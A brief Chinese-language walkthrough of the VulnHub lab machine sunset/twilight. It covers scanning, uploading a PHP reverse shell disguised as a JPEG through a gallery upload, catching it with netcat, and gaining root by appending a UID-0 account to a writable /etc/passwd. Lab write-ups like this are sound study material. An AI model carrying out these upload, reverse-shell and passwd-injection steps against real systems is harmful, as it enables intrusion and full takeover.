vulnhub之sunset/twilight的实践

今天实践的是vulnhub的sunset/twilight镜像，

下载地址，https://download.vulnhub.com/sunset/twilight.7z，

先是用workstation导入，做地址扫描没扫到地址，

于是又用virtualbox导入，重新做地址扫描，

sudo netdiscover -r 192.168.0.0/24，这回有地址了，191就是，

再继续做端口扫描，sudo nmap -sS -sV -T5 -A -p- 192.168.0.191，

有web服务，做一下目录暴破，dirb http://192.168.0.191，

浏览器访问http://192.168.0.191/gallery/index.php，

kali攻击机上准备web反弹shell文件，

cp /usr/share/webshells/php/php-reverse-shell.php shell.php，

改好反弹的地址和端口，并改扩展名，mv shell.php shell.php.jpeg，

用burp suite上传文件，并修改文件名，

上传成功，

kali攻击机上开个反弹shell监听，nc -lvp 4444，

浏览器访问http://192.168.0.191/gallery/original/shell.php，

反弹shell这就过来了，id确认不是root，需要提权，

查看到passwd文件是可写的，ls -l /etc/passwd，

向里面添加一个root权限的账号，

echo "hacker:sa3tHJ3/KuYvI:0:0:hacker:/root:/bin/bash" >> /etc/passwd，

切换账号，su hacker，再id确认是root，

本期的实践比较简单，一般来说，普通账户不应该可写passwd文件。